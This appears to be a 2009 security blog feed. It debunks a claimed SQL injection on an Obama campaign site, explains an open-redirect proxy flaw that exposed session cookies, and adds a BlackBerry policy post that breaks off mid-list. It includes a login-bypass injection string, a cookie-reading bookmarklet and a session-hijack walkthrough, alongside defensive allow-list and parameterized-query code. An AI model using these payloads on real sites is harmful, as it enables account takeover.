		<link>http://praetorianprefect.com/archives/2009/10/the-barack-obama-donations-site-was-hacked%e2%80%a6err-no-it-wasn%e2%80%99t/</link>
		<comments>http://praetorianprefect.com/archives/2009/10/the-barack-obama-donations-site-was-hacked%e2%80%a6err-no-it-wasn%e2%80%99t/#comments</comments>
		<pubDate>Tue, 27 Oct 2009 02:45:53 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[politics]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=1170</guid>
		<description><![CDATA[This morning a security researcher identified that he was able to carry out a successful SQL Injection attack against donate.barackobama.com, the official campaign donation site of current President Barack Obama, and gain access to credentials such as user names and passwords for persons who have donated to the Obama campaign, as well as administrative user credentials. On his blog he goes on to postulate the further attack possibilities with admin access such as web site defacement, uploading phpshells, and so forth. The problem is that the researcher Unu didn’t find an SQL injection site on donate.barackobama.com, he found one on a <a href="http://www.roosevelt.edu/calendars/calendar.asp">calendar application</a> at Roosevelt University. In the process of finding out how that would be possible, a real web site vulnerability on the Obama web site reveals itself.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/barackobama_pass.JPG"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/barackobama_pass-150x150.jpg" alt="barackobama_pass" title="barackobama_pass" width="150" height="150" class="alignleft size-thumbnail wp-image-1198" /></a>This morning a security researcher identified that he was able to carry out a successful SQL Injection attack against donate.barackobama.com, the official campaign donation site of current President Barack Obama, and gain access to credentials such as user names and passwords for persons who have donated to the Obama campaign, as well as administrative user credentials. On his blog he goes on to postulate the further attack possibilities with admin access such as web site defacement, uploading phpshells, and so forth. The problem is that the researcher Unu didn’t find an SQL injection site on donate.barackobama.com, he found one on a <a href="http://www.roosevelt.edu/calendars/calendar.asp">calendar application</a> at Roosevelt University. In the process of finding out how that would be possible, a real web site vulnerability on the Obama web site reveals itself.</p>

<blockquote>
  <p>“We have a table admin. And in this table we can see that the admin passwords are in PLAIN TEXT! The website is big, with many sections, and there are 19 admins. What else we need to get full access on the website? Nothing. After we log in as admins, we can virtually do anything we want with the website: upload PHPShells, redirects, infect pages with Trojan droppers, [and even deface the whole website],” &#8211; Unu</p>
</blockquote>

<p>Speculative holes become apparent in reading the <a href="http://unu1234567.baywords.com/">blog entry</a>. The blog states, and Pangolin shows, that the database backend to the site is MS Access.  Why would a professionally built web site (the site was built by a firm called <a href="http://www.bluestatedigital.com/">Blue State Digital</a>) use MS Access to store data? The Obama donation site, like the other sites built by Blue State Digital, is PHP based and appears to use the <a href="http://expressionengine.com/tutorials/">Expression Engine</a> content management system (CMS) by <a href="http://ellislab.com/">EllisLab</a>. Expression Engine uses MySQL, another inconsistency. Finally, the donate.barackobama.com web site does not have user ids and passwords; it takes contributions directly from a form the user fills out.</p>

<p><div id="attachment_1198" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/barackobama_pass.JPG"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/barackobama_pass-300x217.jpg" alt="Pangolin screenshot supposedly demonstrating SQL Injection of Obama web site." title="barackobama_pass" width="300" height="217" class="size-medium wp-image-1198" /></a><p class="wp-caption-text">Pangolin screenshot supposedly demonstrating SQL Injection of Obama web site.</p></div>
<br /><br /></p>

<p>Officials with responsibility around the web site responded similarly. Hari Sevugan of the DNC stated that “based on the number of incorrect assertions, we do not think that this information is credible. There has been no security breach”. Jascha Franklin-Hodge the CTO at Blue State Digital followed with: “After careful review, we are confident that the screenshot included in this bug does not contain any data from the barackobama.com or any other site hosted by Blue State Digital, the DNC, or Organizing for America. Microsoft Access is not used in any capacity on the barackobama.com site or servers.”</p>

<p>Not everybody agreed as of this morning. Chet Wisniewski of Sophos posted the following, based largely on Unu&#8217;s other successful exploits: <i>The Tech Herald is reporting that they have spoken to the Democratic National Committee who deny Obama&#8217;s site was hacked. This is not surprising, and I believe is also incorrect. The usernames all match up with Obama staffers and campaign staff, which if the screenshot posted by Unu was mocked up would be a lot more work than most scammers would bother with.</i> 
<br />Source: <a href="http://www.sophos.com/blogs/chetw/g/2009/10/26/obama-vulnerable-sql-injection-headline/">http://www.sophos.com/blogs/chetw/g/2009/10/26/obama-vulnerable-sql-injection-headline/</a></p>

<h3>So what site did Unu the researcher pop?</h3>

<p>Here is <a href="http://www.roosevelt.edu/calendars/iclCalendar.asp">Roosevelt University’s calendar</a>. We were led here by the keywords showing up in the Pangolin screenshot.  Fingerprinting the calendar application at Roosevelt University shows that it is an Active Server Pages application relying on an MS Access database.  Errors on the calendar application reference the MS Access ODBC driver. So we’ve found the MS Access database in question. One of the admin accounts in the screenshots is id: webmaster pw: calAdmin…, or calendar administrator. Looking at the calendar itself on the Roosevelt U web site, the abbreviation CCL shows up, standing for “Center for Campus Life”.  Looking again at the list of ids, there is a cclschadmin, likely Center for Campus Life scheduling administrator or something similar.</p>

<h3>Why did Unu start at one site and end up popping another?</h3>

<p>Google cache provides us the answer.</p>

<p><div id="attachment_1205" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/google_ru.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/google_ru-300x54.jpg" alt="How the sites are linked." title="google_ru" width="300" height="54" class="size-medium wp-image-1205" /></a><p class="wp-caption-text">How the sites are linked.</p></div>
<br />
For some reason the following URL was valid before Blue State Digital made a fix that limits the proxy to a specific allow list. The URL loads whatever page follows the /smartproxy/ subdirectory.
<br /><br />

https://donate.barackobama.com/page/smartproxy/www.roosevelt.edu/calendars/iclCalendar.asp

<br /><br />
This not-so-smart redirect function is perhaps in place to allow webmasters to code pages that refer to resources like images without having to worry about content hosted on secure (with an SSL certificate) versus unsecure web servers, and the browser error messages that come up with mixed content. Or it may simply be there to capture click metrics when people leave the site for outside resources. There are a number of reasons people set up such site redirects. Regardless, a web site should almost never allow a user to fill in where the site will redirect to under its own domain. We’ll get into why in the next section.
<br /><br />
There is a common resource referenced in /home/bsdrelease/framework called smartproxy.inc.php. We can identify it because some of the sites created by Blue State Digital (assumed to be the /bsd) are outputting their PHP errors, as shown below:</p>

<p><div id="attachment_1203" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/dccorg.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/dccorg-300x198.jpg" alt="Identifying the SmartProxy code as common to all web sites by Blue State Digital" title="dccorg" width="300" height="198" class="size-medium wp-image-1203" /></a><p class="wp-caption-text">Identifying the SmartProxy code as common to all web sites by Blue State Digital</p></div>
<br />
This allows us to identify other web sites with the same architecture. A quick google for /bsdrelease/framework brings up dccc.org, onewisconsinnow.org, udallforcolorado.com, progressivebookclub.com, progressnowcolorado.org, and other Democrat affiliated web sites. So any problem identified in one web site will likely work on the other web sites using the same common code base. In production web sites, PHP’s error reporting should be turned off.</p>

<h3>So what’s the vulnerability?</h3>

<p>It is not nearly as headline grabbing as the potential to steal login credentials from Obama donors, but until it was corrected at some point recently, the ability to redirect to any web site from donate.barackobama.com or any of the other sites mentioned above was not a good thing. Why?</p>

<p>First, it is a common technique of phishers or anyone attempting to get users to input information at a URL to try to make the domain look as legitimate as possible. When a bad actor can send out e-mails that are prefaced with the actual Obama donation site URL, but actually load any other web site to accept information, it makes masquerading as a legitimate web site that much easier.</p>

<p>Second, and more important, is that the cookies from any of these web sites can be read by the site that is redirected to, because according to the browser you are still under donate.barackobama.com. On sites that don’t have credentials, like the donate site, this is not really an issue. But other sites in the family, such as my.barackobama.com, do accept user registrations and have login/password authentication.  A cookie called PHPSESSID is set. If a bad actor can get a user to click on a link under the my.barackobama.com domain that actually redirects to his web site, he can read this session cookie, set it himself, and be logged in as that user on the barackobama.com web site. How hard would it be to get logged-in users on the site to click a link? You are allowed to set up a blog on the web site, write one story and direct people to a link in the story.</p>

<p>At one point last year you would not even have had to do that: the community blogs section of the site was redirecting to Hillary Clinton’s web site because of a vulnerability where HTML characters were allowed in the blog entries. This allowed a bad actor to inject JavaScript into the pages, which would be executed as part of the page load by subsequent users. The JavaScript included a redirect, and Barack Obama was now advertising for Hillary Clinton, based apparently on the actions of a mischievous Illinoisan.</p>

<h3>Want to try reading your my.barackobama.com session cookie on another web site?</h3>

<p>Create an id at my.barackobama.com. Force the site to redirect using the /smartproxy/, for example: http://my.barackobama.com/page/smartproxy/www.google.com. You’re now on Google, but check out what cookies you can read. There are a number of ways to do this but here is an easy one, a Javascript bookmarklet:</p>

<pre><code>&lt;a href=
         "javascript:(function(){x=window.open();x.document.write(&amp;#39;%3Cht&amp;#39;+&amp;#39;
ml%3E/r%3Che&amp;#39;+&amp;#39;ad%3E%3Ctitle%3EDisplay%20Cookies%3C/title%3E%3C/he&amp;#39;+&amp;#39;ad
%3E%3Cbo&amp;#39;+&amp;#39;dy%3E&amp;#39;);if%20(document.cookie%20==%20&amp;#39;&amp;#39;)%20x.document.write(
&amp;#39;
No%20Cookies%20Found&amp;#39;);%20else%20{thisCookie%20=%20document.cookie.split(&amp;#39;;%20&amp;#39;);
%20for%20(i=0;%20i%3CthisCookie.length;%20i++)%20{x.document.write(thisCookie[i]%20+%20&amp;#39;%3Cb
r%20//%3E&amp;#39;);}}x.document.write(&amp;#39;%3C/bo&amp;#39;+&amp;#39;dy%3E%3C
/ht&amp;#39;+&amp;#39;ml%3E&amp;#39;);x.document.close();})()"&gt;
            Display Cookies&lt;/a&gt;

</code></pre>

<p>To add the bookmarklet, right click on <a href=
         "javascript:(function(){x=window.open();x.document.write(&#39;%3Cht&#39;+&#39;
ml%3E/r%3Che&#39;+&#39;ad%3E%3Ctitle%3EDisplay%20Cookies%3C/title%3E%3C/he&#39;+&#39;ad
%3E%3Cbo&#39;+&#39;dy%3E&#39;);if%20(document.cookie%20==%20&#39;&#39;)%20x.document.write(
&#39;
No%20Cookies%20Found&#39;);%20else%20{thisCookie%20=%20document.cookie.split(&#39;;%20&#39;);
%20for%20(i=0;%20i%3CthisCookie.length;%20i++)%20{x.document.write(thisCookie[i]%20+%20&#39;%3Cb
r%20//%3E&#39;);}}x.document.write(&#39;%3C/bo&#39;+&#39;dy%3E%3C
/ht&#39;+&#39;ml%3E&#39;);x.document.close();})()">
             this link</a> and select Add to Favorites or Bookmark this Link. When on the redirected Google site, click the bookmark you’ve created, you should see your PHPSESSID from the my.barackobama.com web site.</p>

<p>This problem now appears to be fixed for the most part.  <a href="https://donate.barackobama.com/page/smartproxy/www.google.com">Google as a redirect still works</a>, but many other sites at this point will not, producing the following error:</p>

<pre><code>ERROR: attempt to proxy page from a host not on the allow list. access denied.
</code></pre>

<p>This would indicate that a white list of allowed hosts has been set up.</p>
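<p>As an added illustration of the fix that error message implies, here is an allow-list check in Python for a <code>/page/smartproxy/&lt;target&gt;</code> request path.  This is example code written for this article, not Blue State Digital&#8217;s <code>smartproxy.inc.php</code>; the allowed hosts and the <code>evil.example</code> domain are made up.  The check parses the target and compares its host exactly against the list, so that letter case, a port, a <code>user@host</code> prefix, a scheme-relative <code>//host</code> or a look-alike domain such as <code>www.google.com.evil.example</code> cannot slip past the way they would with a prefix or substring comparison.</p>

```python
import re
from urllib.parse import urlsplit

# Constructed allow list; a real deployment lists only the hosts the site's
# own pages actually need to fetch through the proxy.
ALLOWED_HOSTS = frozenset({"www.google.com", "static.example.org"})

PROXY_PREFIX = "/page/smartproxy/"
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)


class ProxyDenied(Exception):
    """Raised for any target the proxy must not fetch."""


def extract_target(path):
    """Split a /page/smartproxy/<target> request path into (host, remote_path).

    <target> may be a bare host, host/path (the form used in the post) or a
    full http(s) URL. The host comes back lowercased and without a port,
    which is the form compared against the allow list."""
    if not path.startswith(PROXY_PREFIX):
        raise ProxyDenied("not a smartproxy request")
    target = path[len(PROXY_PREFIX):]
    if SCHEME_RE.match(target):
        if not target.lower().startswith(("http://", "https://")):
            raise ProxyDenied("scheme not allowed")
    else:
        target = "http://" + target            # bare host form
    try:
        parts = urlsplit(target)
    except ValueError as exc:                  # e.g. malformed IPv6 literal
        raise ProxyDenied("unparseable target: %s" % exc)
    if parts.username is not None or parts.password is not None:
        # "www.google.com@evil.example" would otherwise look allowed
        raise ProxyDenied("userinfo not allowed")
    host = parts.hostname                      # lowercased, port stripped
    if not host:
        raise ProxyDenied("no host in target")
    remote_path = parts.path or "/"
    if parts.query:
        remote_path += "?" + parts.query
    return host, remote_path


def is_allowed(path, allowed=ALLOWED_HOSTS):
    """True only if the target host is exactly one of the allowed hosts."""
    try:
        host, _ = extract_target(path)
    except ProxyDenied:
        return False
    return host in allowed


if __name__ == "__main__":
    for req in ("/page/smartproxy/www.google.com",
                "/page/smartproxy/www.roosevelt.edu/calendars/iclCalendar.asp",
                "/page/smartproxy/www.google.com@evil.example/"):
        print(req, "->", "proxied" if is_allowed(req) else "denied")
```

<p>Even with the list in place, anything fetched through such a proxy is served under the site&#8217;s own origin, so the list has to be short and made up of hosts whose content the site is prepared to treat as its own; the check limits who can be proxied, it does not change what a proxied page can do.</p>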

<h3>Not the Same Server</h3>

<p>The Tech Herald reported the following earlier today:</p>

<p><i>“Unu has apparently accessed a database on the same server that is unrelated to President Obama’s site…If so, we asked why an SQLi from President Obama’s site allowed access to the Access database…While this is pure speculation on our part, perhaps the DNC is correct. It is possible that Unu has in fact accessed the database for a different site entirely that resides on the same server” </i></p>

<p>Source: <a href="http://www.thetechherald.com/article.php/200944/4682/Researcher-discloses-SQL-Injection-flaw-on-barackobama-com">http://www.thetechherald.com/article.php/200944/4682/Researcher-discloses-SQL-Injection-flaw-on-barackobama-com</a></p>

<p>The Roosevelt University website is hosted in Englewood Colorado by NTT America, the Barack Obama donation website is hosted in Washington, D.C. by Internap Network Services on behalf of Blue State Digital. The web sites are not hosted on the same server.</p>

<h3>Who’s Unu?</h3>

<p>Unu, apparently from Bucuresti, Romania, says that for him penetration testing and finding vulnerabilities is a hobby and a passion. His blog, a testament to the results of his hobby, is a compilation of successful SQL Injection attacks against web sites like BNP Paribas, Credit Agricole in France, Royal Bank of Scotland&#8217;s WorldPay, Poste Italiane (the Italian Postal Service) and others, as well as examples of successful parameter manipulation and other web application vulnerabilities.  He appears to practice a version of responsible disclosure in that he has notified the organizations mentioned on the blog and explained the problems. <a href="http://unu1234567.baywords.com/">His blog</a>, and its disclosures, are interesting reading for the security professional and thus we encourage you to have a look.</p>

<p>The site he publishes to is hosted on <a href="http://baywords.com/">Baywords</a>, a blog platform notable in that it was formed to combat what it sees as censorship by other platforms such as WordPress (the platform founders state they set up the service after a friend of theirs was closed down by WordPress for a TOS violation).</p>

<h3>What is Pangolin?</h3>

<p>Pangolin is an automated SQL Injection tool developed by NOSEC ostensibly to assist in penetration testing. The tool can be used to detect SQL injection vulnerabilities on a web application, and upon detection allow the user to perform certain operations such as DBMS fingerprinting, retrieving user ids and hashes, dump tables, run SQL statements, and so forth. NOSEC is a web site hosted by a firm now called Connaught Cup in Shenzhen, China.</p>

<h3>What is SQL Injection?</h3>

<p>SQL Injection is a code injection technique in which data entered into a field on the client is used to alter the SQL query the application executes. For example, let&#8217;s say we have a piece of code like this:</p>

<pre><code>SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password'
</code></pre>

<p>The fields $username and $password come from the browser. Our user normally logs in by entering John as the user id and &#8216;Password1&#8217; as his password (he shouldn&#8217;t have a weak password like that, but he does). The database runs the query, finds the row where $username = John and checks that its password = Password1. The password comparison evaluates as true, and the web application authenticates (logs in) the user.</p>

<p>A bad actor comes along and enters John as the user id, but instead of a password he fills in <i>anything' OR 'x'='x</i>. Let&#8217;s see how our code evaluates this:</p>

<pre><code>SELECT id
FROM logins
WHERE username = 'John'
AND password = 'anything' OR 'x'='x'
</code></pre>

<p>Now the password portion of the query always evaluates to true, not just when the password is actually the correct one. That&#8217;s because we&#8217;ve changed the logic of the query: it now reads that password can equal anything OR x = x. Since x always equals x (they are equivalent values), the password comparison evaluates to true and the web application authenticates the user even though a proper password was never supplied.</p>

<p>SQL Injections in practice get much more complex than this, but the basic premise remains the same: get the web application to execute a SQL query in a way unanticipated by the web site&#8217;s developers, in order to make the application reveal information or perform a database action.</p>
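<p>As an added worked example (not code from the original post), the login query above is run against a constructed in-memory SQLite table, beside the same lookup with bound parameters, which is the fix. It also goes one step beyond the post: because AND binds more tightly than OR, the concatenated query matches every row of the table, so even a user name that does not exist is &#8220;logged in&#8221;, while the parameterized form treats the quotes as plain data.</p>

```python
import sqlite3

PAGE_PAYLOAD = "anything' OR 'x'='x"   # the injected "password" from the post


def make_db():
    """Constructed sample data: an in-memory SQLite 'logins' table like the one in the post."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO logins (username, password) VALUES (?, ?)",
        [("John", "Password1"), ("Alice", "longer-and-better")],
    )
    return conn


def build_query(username, password):
    """The post's query built by string concatenation: whatever the browser sends becomes SQL."""
    return ("SELECT id FROM logins WHERE username = '" + username
            + "' AND password = '" + password + "'")


def vulnerable_login(conn, username, password):
    """Ids of every row the concatenated query matches (an empty list means login denied).
    With the page's payload the WHERE clause becomes
    (username = ... AND password = 'anything') OR 'x'='x', which is true for all rows."""
    rows = conn.execute(build_query(username, password)).fetchall()
    return [r[0] for r in rows]


def safe_login(conn, username, password):
    """Same lookup with bound parameters: quotes in the input stay data, never SQL."""
    rows = conn.execute(
        "SELECT id FROM logins WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    print(build_query("John", PAGE_PAYLOAD))
    print("vulnerable, correct pw:", vulnerable_login(db, "John", "Password1"))  # [1]
    print("vulnerable, injected:  ", vulnerable_login(db, "John", PAGE_PAYLOAD))  # [1, 2]
    print("vulnerable, no such user, injected:", vulnerable_login(db, "nobody", PAGE_PAYLOAD))  # [1, 2]
    print("safe, injected:        ", safe_login(db, "John", PAGE_PAYLOAD))  # []
```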

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/07/turning-an-atm-into-a-slot-machine/">Turning an ATM into a Slot Machine</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/10/the-barack-obama-donations-site-was-hacked%e2%80%a6err-no-it-wasn%e2%80%99t/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>Where is your BES Policy?</title>
		<link>http://praetorianprefect.com/archives/2009/10/where-is-your-bes-policy/</link>
		<comments>http://praetorianprefect.com/archives/2009/10/where-is-your-bes-policy/#comments</comments>
		<pubDate>Mon, 26 Oct 2009 16:23:52 +0000</pubDate>
		<dc:creator>Simon Price</dc:creator>
				<category><![CDATA[Administration]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[data leak prevention]]></category>
		<category><![CDATA[BES]]></category>
		<category><![CDATA[blackberry]]></category>
		<category><![CDATA[exchange]]></category>
		<category><![CDATA[iphone]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[mobile]]></category>
		<category><![CDATA[passwords]]></category>
		<category><![CDATA[policy]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=1139</guid>
		<description><![CDATA[Several months ago, users of a wireless carrier in the United Arab Emirates (UAE) were sent an SMS message to their Blackberry devices instructing them to install a software patch that would resolve recent network trouble they’ve been experiencing. The patch turned out to be spyware (Etisalat.A[MA]) and would intercept the user’s email, sending the [...]]]></description>
			<content:encoded><![CDATA[<p>Several months ago, users of a wireless carrier in the United Arab Emirates (UAE) were sent an SMS message to their Blackberry devices instructing them to install a software patch that would resolve recent network trouble they’ve been experiencing. The patch turned out to be spyware (<a href="http://threatcenter.smobilesystems.com/?p=1001" target="_blank">Etisalat.A[MA]</a>) and would intercept the user’s email, sending the messages to a listening agent inside the Etisalat network.</p>

<p>About one month ago, a problem in the Blackberry browser left devices open to attack due to a certificate notification flaw. An <a href="http://www.blackberry.com/btsc/viewContent.do?externalId=KB19552" target="_blank">advisory</a> from Research in Motion details how a malicious user could spoof a “trusted” website then use a phishing technique to send users to that site using SMS or email.</p>

<p>A malformed SMS message causing a memory corruption error could be used to cause a denial of service or execution of arbitrary code on Apple’s iPhone (<a href="http://support.apple.com/kb/HT3754" target="_blank">CVE-2009-2204</a>). Although not related to Blackberry, I wanted to get the point across that mobile devices are beginning to see their fair share of vulnerabilities which could lead to malicious activity.</p>

<p><img style="border-right-width: 0px; margin: 0px 20px 0px 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="ScreenHunter_18 Oct. 26 10.36" border="0" alt="ScreenHunter_18 Oct. 26 10.36" align="left" src="http://praetorianprefect.com/wp-content/uploads/2009/10/ScreenHunter_18Oct.2610.36_thumb.gif" width="177" height="244" />Turning our focus back to the Blackberry, a director for Hermis Consulting in Jakarta, Indonesia recently wrote an application for the Blackberry which can turn the handheld into a remote bugging device.<br />The software is called <a href="http://chirashi.zensay.com/2009/10/remote-listening-for-the-blackberry/" target="_blank">PhoneSnoop</a> and was written to demonstrate how an &#8220;attacker can activate the microphone of a Blackberry handheld and listen to sounds near or around it.&#8221; There are currently no stealth or spyware aspects of the software, but it shows how the capabilities of a Blackberry could be used for malicious purposes.</p>

<p>These issues remind me of my previous position, managing a global infrastructure team for a financial company.&#160; Exchange and Blackberry services were under our umbrella of responsibilities.&#160; When I first arrived many years ago, as with most companies that are victims of rapid growth, IT policies were non-existent.&#160; Though unpopular with the users, I had to have a BES policy implemented, and one that took quite a bit of control from the user. From password policies to WiFi disabling, where is your BES policy?</p>


<p><img style="border-right-width: 0px; margin: 0px 20px 20px; float: right; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="blackberry-bold-att-single_tall" border="0" alt="blackberry-bold-att-single_tall" align="right" src="http://praetorianprefect.com/wp-content/uploads/2009/10/blackberryboldattsingle_tall.jpg" width="123" height="175" /></p>

<p><em>Note: A BES (BlackBerry Enterprise Server) is middleware that connects to your enterprise messaging solution (such as Microsoft Exchange or IBM Lotus Domino) and redirects email and PIM information to and from Blackberry mobile devices. </em></p>

<p><em>Note: A BES IT Policy is configured on the BES and assigned to the Blackberry devices over the air.&#160; Policies can be assigned to users and user groups. The default installation does not enforce any policies; enabling them is a best practice on any platform or device. See the bottom of this post for the KB with instructions on how to create and apply policies.</em></p>

<h4>At the bare minimum, you should have these basic policies set:</h4>

<ul>
<li>Password Required Rule – True</li>
<li>User Can Change Time – False</li>
<li>User Can Disable Password – False</li>
<li>Password Pattern Checks – Require at least 1 alpha and 1 numeric</li>
<li>Minimum Password Length – 7 characters</li>
<li>Maximum Password Age – 30 or 60 days</li>
<li>Set Password Timeout – 10 minutes</li>
<li>Set Maximum Password Attempts – 10</li>
<li>Maximum Password History – 6</li>
<li>Set Owner Info – Customize</li>
<li>Set Owner Name – Customize</li>
<li>Lock Owner Info – Customize</li>
<li>Remote Wipe Reset to Factory Defaults – True</li>
</ul>

<h4>Control Upgrades:</h4>

<ul>
<li>Allow Non Enterprise Upgrade – False</li>
<li>Disallow Device User Requested Upgrade – True</li>
</ul>

<h4>Camera Options:</h4>

<ul>
<li>Disable Photo Camera – True</li>
<li>Disable Video Camera – True</li>
</ul>

<h4>Application Control:</h4>

<ul>
<li>Disable Application Center – True</li>
<li>Allow Application Download Services – False</li>
<li>Disallow Third Party Application Downloads – True</li>
</ul>

<h4>Other Policies I Like:</h4>

<ul>
<li>Disable USB Mass Storage – True</li>
<li>Disable Blackberry Messenger – True</li>
<li>Disable Bluetooth – True</li>
<li>Allow Application Download Services – False</li>
<li>Allow Hotspot Browser – False</li>
<li>Allow IBS Browser – False</li>
</ul>

<h4>Too Much?</h4>

<p>At a glance these policies may sound too strict, but the purpose of the device is for users to have access to their email, contacts and calendars anywhere and to have a mobile phone on which they can be reached at any time.&#160; Cameras, hotspots and transferring photos and music using USB mass storage are features that are not necessary for that. If you have legitimate business needs for these features, then you can enable them for certain user groups using a policy.</p>

<p>The policies mentioned are a very small fraction of what is available. I’d like to hear which policies you find useful in your environment, or which you find to be more harm than good.</p>

<p>For a complete list of policies, please see the <a href="http://docs.blackberry.com/eng/deliverables//3801/Policy_Reference_Guide.pdf" target="_blank">Policy Reference Guide</a>.</p>


<h4>Howto</h4>

<p><b>Create, Assign, View, and Send IT policies</b><br />
<b>Doc ID :</b> KB02022<br />
<b>Last Modified :</b> 2007-02-01<br />
<b>Document Type :</b> How To</p>

<p><b>Environment</b><br />
This article applies to BlackBerry® Enterprise Server software versions 3.6, 4.0, and 4.1 for Microsoft® Exchange.</p>

<p><b>Procedure</b><br />
The BlackBerry Enterprise Server uses an IT policy to control the behavior of the BlackBerry devices assigned to it. IT policies cover a wide range of BlackBerry device functions (for example, passwords, attachment viewing, and available browsers). Administrators can create custom IT policies in addition to the IT policies already present on the BlackBerry Enterprise Server.</p>

<p><b>Creating IT Policies</b><br />
To create an IT policy, complete these steps:<br />
BlackBerry Enterprise Server software versions 3.6 and 4.0</p>

<ol>
<li>Depending on your version, open the BlackBerry Enterprise Server Management console or BlackBerry Manager.</li>
<li>Right-click the BlackBerry Enterprise Server name, then click <b>IT Policy</b>.</li>
<li>Click <b>New</b>, then create a name for the IT policy.</li>
<li>Select the check box beside each IT policy rules item you would like to assign. A description of the IT policy will appear.</li>
<li>To enable the selected IT policy, in the description window, click <b>TRUE</b>.</li>
<li>Click <b>Apply</b>, then click <b>OK</b>.</li>
</ol>

<p>BlackBerry Enterprise Server software version 4.1</p>

<ol>
<li>In BlackBerry Manager, select <b>Servers</b>, then click the <b>Global</b> tab.</li>
<li>From the Tasks menu, click <b>Edit Properties</b>.</li>
<li>Select <b>IT Policy</b>, then double-click <b>IT Policies</b>.</li>
<li>Click <b>New</b>, then create a name for the IT policy.</li>
<li>Select an IT policy group to view the associated IT policy rules.</li>
<li>Select the appropriate IT policy rules.</li>
<li>Click <b>Apply</b>, then click <b>OK</b>.</li>
</ol>

<p><b>Assigning IT Policies</b><br />
To assign an IT policy to a BlackBerry device user, complete the following steps:<br />
BlackBerry Enterprise Server software versions 3.6 and 4.0</p>

<ol>
<li>Depending on your version, open the BlackBerry Enterprise Server Management console or BlackBerry Manager.</li>
<li>Right-click the BlackBerry Enterprise Server name, then click <b>IT Policy</b>.</li>
<li>Select an IT policy, then click <b>Edit User List</b>.</li>
<li>Click <b>Add Users to This Policy</b>.</li>
<li>Select a BlackBerry device user, then click <b>Add</b>.</li>
<li>Click <b>Close</b>, then click <b>OK</b> to close the Edit IT Policy Userlist window.</li>
<li>Click <b>OK</b> again.</li>
</ol>

<p>BlackBerry Enterprise Server software version 4.1</p>

<ol>
<li>In BlackBerry Manager, select <b>Servers</b>, then click the <b>Global</b> tab.</li>
<li>From the Tasks menu, select <b>Edit Properties</b>.</li>
<li>Select <b>IT Policy</b>, then double-click <b>IT Policy to User Mapping</b>.</li>
<li>Select a BlackBerry device user, then click the button next to the appropriate IT policy.</li>
<li>Click <b>OK</b> to close the IT Policy to User Mapping window.</li>
<li>Click <b>Apply</b>, then click <b>OK</b>.</li>
</ol>

<p><b>Viewing IT Policies</b><br />
To view IT policies on the BlackBerry Enterprise Server, complete these steps:<br />
BlackBerry Enterprise Server software versions 3.6 and 4.0</p>

<ol>
<li>Depending on your version, open the BlackBerry Enterprise Server Management console or BlackBerry Manager.</li>
<li>Right-click the BlackBerry Enterprise Server name, then click <b>IT Policy</b>.</li>
<li>Select an IT policy, then click <b>View</b> to see the BlackBerry device and Desktop Policy Settings that have been applied.</li>
<li>Click <b>OK</b> to close the View Policy window.</li>
<li>Click <b>OK</b> again.</li>
</ol>

<p>BlackBerry Enterprise Server software version 4.1</p>

<ol>
<li>In BlackBerry Manager, click <b>Servers</b>, then click the <b>Global</b> tab.</li>
<li>From the Tasks menu, select <b>Edit Properties</b>.</li>
<li>Select <b>IT Policy</b>, then double-click <b>IT Policies</b>.</li>
<li>To view the IT policy rules, click <b>Properties</b>.</li>
<li>Click <b>OK</b>.</li>
</ol>

<p>To view an IT policy on a BlackBerry device, complete these steps:</p>

<ol>
<li>From the Home screen, select <b>Options</b>.</li>
<li>Select <b>Security Options &gt; General Settings</b>.</li>
<li>The IT policy Name, Last Updated, and Time Stamp fields will be listed.</li>
</ol>

<blockquote>   <p><b>Note:</b> Depending on the BlackBerry device and BlackBerry Device Software version, the instructions for viewing the IT policy on the BlackBerry device may vary. For example, on the BlackBerry 7100 series, the BlackBerry device user must select <b>Settings</b> or <b>Tools</b>, then select <b>Security</b>.</p> </blockquote>

<p><b>Sending IT Policies</b><br />
To send an IT policy to a BlackBerry device user, complete the following steps:<br />
<b>Note:</b> By default, when you assign an IT policy to a BlackBerry device user, the IT policy is automatically sent to the BlackBerry device user.<br />
<b>Note:</b> When a change is made to an existing IT policy, it is automatically resent to all BlackBerry device users assigned to that IT policy.<br />
BlackBerry Enterprise Server software versions 3.6 and 4.0</p>

<ol>
